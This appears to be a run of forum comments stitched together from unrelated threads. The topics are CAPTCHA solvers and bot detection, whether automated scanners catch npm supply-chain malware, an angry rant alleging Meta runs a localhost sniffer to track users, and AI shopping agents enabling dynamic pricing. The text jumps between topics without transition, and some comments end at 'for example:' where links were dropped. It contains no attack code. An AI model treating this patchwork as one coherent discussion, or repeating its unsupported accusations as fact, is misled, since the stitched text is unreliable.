The solvers are a problem but they give themselves away when they incorrectly fake devices or run out of context. I run a bot detection SaaS and we've had some success blocking them. Their advertised solve times are also wildly inaccurate. They take ages to return a successful token, if at all. The number of companies providing bot mitigation is also growing rapidly, making it difficult for the solvers to stay on top of reverse engineering etc.
That's a good question. I haven't checked the stats to see how often it happens but I will make a note to return with some info. We're dealing with the entire internet, not just YC companies, and many scrapers / solvers will pass up a user agent that doesn't quite match the JS capabilities you would expect of the browser version. Some solving companies allow you to pass up user agent , which causes inconsistencies as they're not changing their stack to match the user agent you supply. Under the hood they're running whatever version of headless Chrome they're currently pinned to.
> automated scanners seem to do a good job already of finding malicious packages.
That's not true. This latest incident was detected by an individual researcher, just like many similar attacks in the past. Time and again, it's been people who flagged these issues, later reported to security startups, not automated tools. Don't fall for the PR spin.
If automated scanning were truly effective, we'd see deployments across all major package registries. The reality is, these systems still miss what vigilant humans catch.
> This latest incident was detected by an individual researcher
So that still seems fine? Presumably researchers are focusing on latest releases, and so their work would not be impacted by other people using this new pnpm option.
> If automated scanning were truly effective, we'd see deployments across all major package registries.
No we wouldn't. Most package registries are run by either bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure).
And many of them barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentives of building up supply chain security tools into the package registries themselves are just not there.
You're right that registries are under-resourced. But, if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines. However, that isn't happening. Instead, we see piecemeal efforts from Google with assurance artifacts (SLSA provenance, SBOMs, verifiable builds), Microsoft sponsoring OSS maintainers, Facebook donating to package registries. Google's initiatives stop short of claiming they can automatically detect malware.
This distinction matters. Malware detection is, in the general case, an undecidable problem (think halting problem and Rice theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove absence of malicious behavior.
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources.
> But, if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines.
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub does support DependaBot, which runs supply chain checks.
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where said malware runs in spite of not being explicitly provided deployment or execution permissions. And yet it deploys and runs. What do you expect if you make code intentionally installable and deployable, and capable of sending HTTP requests to send and receive any kind of data?
Contrary to what you are implying, this is not a simple problem with straight-forward solutions. The security model has been highly reliant on the role of gatekeepers, both in producer and consumer sides. However, the last batch of popular supply chain attacks circumvented the only failsafe in place. Beyond this point, you just have a module that runs unspecified code, just like any other module.
The latest incident was detected first by an individual researcher (haven't verified this myself, but trusting you here) -- or maybe s/he was just the fastest reporter in the west. Even simple heuristics like the sudden addition of high-entropy code would have caught the most recent attacks, and obviously there are much better methods too.
Quite possibly - there have been several incidents recently and a number of researchers working together so it’s not clear exactly who found something first and it’s definitely not as simple to fix as tossing a tool in place.
The CEO of socket.dev described an automated pipeline flagging new uploads for analysts, for example, which is good but not instantaneous:
The Aikido team also appear to be suggesting they investigated a suspicious flag (apologies if I’m misreading their post), which again needs time for analysts to work:
My thought was simply that these were caught relatively quickly by security researchers rather than by compromised users reporting breaches. If you didn’t install updates with a relatively short period of time after they were published, the subsequent response would keep you safe. Obviously that’s not perfect and a sophisticated, patient attack like liblzma suffered would likely still be possible but there really does seem to be a value to having something like Debian’s unstable/stable divide where researchers and thrill-seekers would get everything ASAP but most people would give it some time to be tested. What I’d really like to see is a community model for funding that and especially supporting independent researchers.
> managed pull-through caches implemented via tools like Artifactory
This is why package malware creates news, but enterprises mirroring package registries do not get affected. Building a mirroring solution will be pricey though mainly due to high egress bandwidth cost from Cloud providers.
Why should MS buy any of these startups when a developer (not any automated tech) found the malware? It looks like these startups did after-the-fact analysis for PR.
on the other hand, the previous supply chain attack was found by automated tech.
Also, if MS would be so kind as to just run similar scans at the time a package is updated instead of after the package is updated (which is the only way the automated tech can run if npm doesn't integrate it), then malware like this would be way less common.
Hi, I'm Charlie from Aikido, as mentioned above. Yes, we detected it automatically, and I alerted Josh to the situation on BSky.
There's no reason why Microsoft/npm can't do what we're doing, or any of the other handful to dozen companies that do similar things to us, to protect the supply chain.
The kind of shady practices we have seen from this company, any self-respecting individual will be ashamed except Zuck. He has done more to rot the collective brain of a generation than any single figure in tech history.
The truth is, Meta isn’t building community, it’s building a surveillance hellscape where every click, glance, and pause is commodified. If you work there and still believe you're doing something good for the world, you're either delusional or willfully blind.
They have been running a sniffer agent on localhost so they can track you over VPN and incognito. Why are people still using Meta crap? They are a surveillance/spyware company.
> In short, it's not consumers who want robots to buy for them, it's producers who want robots to buy from them using consumers dollars.
This. Humans are lazy and often don’t provide enough data on exactly what they are looking for when shopping online. In contrast, Agents can ask follow up questions and provide a lot more contextual data to the producers, along with the history of past purchases, derived personal info, and more. I’d not be surprised if this info is consumed to offer dynamic pricing in e-commerce. We already see dynamic pricing being employed by travel apps (airfare/uber).